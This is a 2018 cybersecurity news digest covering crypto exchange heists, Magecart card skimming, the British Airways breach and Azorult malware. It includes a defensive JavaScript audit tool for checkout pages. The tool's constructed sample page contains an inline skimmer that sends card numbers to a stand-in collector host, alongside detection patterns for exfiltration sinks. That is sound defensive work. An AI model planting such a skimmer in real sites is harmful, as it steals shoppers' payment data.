According to the Cryptocurrency Anti-Money Laundering Report from CipherTrace, some $927 million was stolen from cryptocurrency exchanges in the first three quarters of 2018 alone. That total will almost certainly have hit, if not smashed straight through, the $1 billion mark by now. So, who were the hackers behind the heists and how did they get away with it?
The how remained sadly predictable throughout the year: exploiting vulnerabilities in crypto wallet software and servers, social engineering and password compromise, and insider theft. The who covers equally predictable territory, from lone-wolf criminal opportunists at the lower end of the scale through to well-resourced nation-state actors at the other.
Read more about cryptocurrency theft in 2018 on Forbes.
Cyber-criminal gangs are believed to have stolen tens of millions of dollars from at least eight banks in Eastern Europe using tactics usually seen only in Hollywood movies. These “hacks” consisted of cyber-criminals entering bank offices to inspect and then leave malicious devices connected to the bank’s network.
Russian cyber-security firm Kaspersky Lab, which was called to investigate some of these mysterious cyber-heists, says it found three types of devices at offices at the eight banks it reviewed: cheap laptops, Raspberry Pi boards and malicious USB thumb drives known as Bash Bunnies.
Read more about the Hollywood-style hacks on European banks on ZDNet.
As we move forward to 2019, expect credit card and payment information theft to continue to rise. Yes, this isn’t a major surprise; however, if organizations can better address the reasons for the rise in cybercrime, they will be better prepared.
The good news: advanced security technologies are constantly being brought to market. The not-so-good news: threat actors are not letting that get in the way; witness ever more intense and sophisticated attacks.
Although the malicious code was discovered last week, researchers were able to determine its purpose recently, when they managed to decrypt and deobfuscate it.
At least seven different cybercrime groups collectively referred to as “Magecart” are placing digital credit card skimmers on compromised e-commerce sites, Flashpoint and RiskIQ reveal in a joint report. Active since at least 2015, the Magecart groups steal credit card information by injecting skimmer scripts into the checkout pages of sites they have compromised, capturing the card data that shoppers enter and sending it to servers under the attackers' control.
After conducting a thorough investigation into these attacks, Flashpoint and RiskIQ security researchers concluded that the Magecart umbrella does not represent a single group of attackers but at least seven of them, each with its own skimmers, tactics, targets and other distinguishing traits. The list, however, is not comprehensive.
Read more about the new research on Magecart on SecurityWeek.
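The skimmer-on-compromised-site technique described above lends itself to a static check a site owner can run against their own checkout page: every script include should come from an approved host, be pinned with Subresource Integrity, and the page should carry a Content-Security-Policy that denies the channels a skimmer needs to get card data off the page. The block below is an added example written for this digest, not code from the Flashpoint/RiskIQ report or from any Magecart group; the host names, the sample page and the `integrity` value are constructed, and the script-host allowlist is an assumption standing in for whatever a real site actually approves.

```javascript
// Added example, not code from the Flashpoint/RiskIQ report or from any
// Magecart skimmer: a static audit of a checkout page for the conditions web
// skimmers depend on. All host names and the sample page are constructed.

// Assumed set of origins the site owner has approved to serve script on the
// checkout page (hypothetical names).
const ALLOWED_SCRIPT_HOSTS = new Set(["shop.example", "cdn.example"]);

// Constructed sample page: an approved script pinned with SRI, an approved
// script without SRI, an unreviewed third-party include, and an inline script
// that hooks the card field and beacons it out via an image request.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout">
  <input name="cc_number"><input name="cc_cvv">
</form>
<script src="https://cdn.example/checkout.js" integrity="sha384-placeholder" crossorigin="anonymous"></script>
<script src="https://shop.example/app.js"></script>
<script src="https://static.analytics-host.test/track.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var d = btoa(document.querySelector('[name=cc_number]').value);
    new Image().src = "https://collector.test/i.png?d=" + d;
  });
</script>
</body></html>`;

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
// References to card data inside an inline script ...
const PAYMENT_FIELD = /cc_|card|cvv|cvc|expir/i;
// ... combined with any way of sending data off the page.
const EXFIL_SINK = /new\s+Image\s*\(|fetch\s*\(|XMLHttpRequest|sendBeacon|WebSocket/;

// Read a double-quoted attribute value out of a script tag's attribute string.
function attr(attrs, name) {
  const m = new RegExp("\\b" + name + "\\s*=\\s*\"([^\"]*)\"", "i").exec(attrs);
  return m ? m[1] : null;
}

// Returns one finding per risky script: { kind, detail }.
function auditScripts(html, allowedHosts, pageUrl = "https://shop.example/checkout") {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const [, attrs, body] = m;
    const src = attr(attrs, "src");
    if (src) {
      const host = new URL(src, pageUrl).hostname; // resolves relative src against the page
      if (!allowedHosts.has(host)) {
        findings.push({ kind: "unknown_third_party_script", detail: src });
      } else if (!attr(attrs, "integrity")) {
        // Without SRI a tampered copy on the approved host loads unnoticed.
        findings.push({ kind: "missing_sri", detail: src });
      }
    } else if (PAYMENT_FIELD.test(body) && EXFIL_SINK.test(body)) {
      findings.push({ kind: "inline_exfil_pattern", detail: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// A Content-Security-Policy that permits only the approved script hosts and
// keeps fetch/XHR/beacon, image loads and form posts first-party, which closes
// the exfil channels above even if a skimmer does get injected. There is no
// 'unsafe-inline', so the inline hook in the sample page is refused outright.
function buildCsp(allowedHosts) {
  const hosts = [...allowedHosts].map((h) => "https://" + h).join(" ");
  return `script-src 'self' ${hosts}; connect-src 'self'; img-src 'self'; form-action 'self'`;
}

for (const f of auditScripts(SAMPLE_CHECKOUT_HTML, ALLOWED_SCRIPT_HOSTS)) {
  console.log(f.kind, f.detail);
}
console.log("Content-Security-Policy:", buildCsp(ALLOWED_SCRIPT_HOSTS));
```

The inline-script match is a heuristic: real skimmers are obfuscated and will not name the card field or the sink so plainly, so treat that finding as a prompt for manual review. The allowlist, SRI and CSP checks are the dependable part, because they do not depend on recognising the skimmer's code at all, only on refusing script and outbound requests the site owner never approved.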
British Airways has revealed that the massive data breach which struck hundreds of thousands of customers is bigger than first believed. The UK carrier said that a further 185,000 customers may have had their information stolen during the data breach.
In total, the threat actors behind the attack potentially gained access to an additional 77,000 payment card records containing names, billing addresses, email addresses, payment information — including card numbers and expiry dates — and the CVV numbers linked to each card. A further 108,000 payment card records were potentially compromised but did not contain an accompanying CVV security number.
Read more about the new figures for the massive data breach on ZDNet.
Cryptocurrency exchange Trade.io has admitted to a security breach. The company said that an unknown party has withdrawn over 50 million Trade tokens (TIO) from its cold storage wallets. The funds are worth over $7.5 million at Monday’s TIO trading price. It is unclear how the hack happened.
Cold storage wallets keep the private keys that control the funds offline, typically on a hardware device or other media that is never connected to the internet, so that the keys cannot be reached from a compromised server. Trade.io said it stored its cold storage wallet in safety deposit boxes in banks. “We have confirmed that the safety deposit boxes were not compromised,” said Trade.io CEO Jim Preissler.
Read more about the mysterious Trade.io hack on ZDNet.
Malware that steals passwords, credit card details and cryptocurrency has been updated, making it even more potent for cyber criminals. The Azorult malware has been operating since 2016 and enables crooks to steal credentials including passwords, credit card details, browser histories and the contents of cryptocurrency wallets from victims.
Now a new version of it is being advertised on an underground forum, as uncovered by researchers at security company Check Point, who describe it as “substantially updated”. New features include the ability to steal additional forms of cryptocurrency from victims' wallets: BitcoinGold, electrumG, btcprivate (electrum-btcp), bitcore and Exodus Eden.
Read more about the recent update of the Azorult malware on ZDNet.
Group-IB has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to Lazarus, the North Korean state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, in which $534 million in crypto was stolen.
In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement.
Credential theft was substantially up in the United States during the third quarter – even as declines were charted in Europe and Asia.
Periodic analysis from Blueliv shows a whopping 141 percent increase in compromised credentials from North American targets between June and August compared to the March through May period. In contrast, fewer compromised European and Asian credentials were detected over the same period (22 percent and 36 percent decreases respectively).
Read more about the findings of the Blueliv analysis on Threatpost.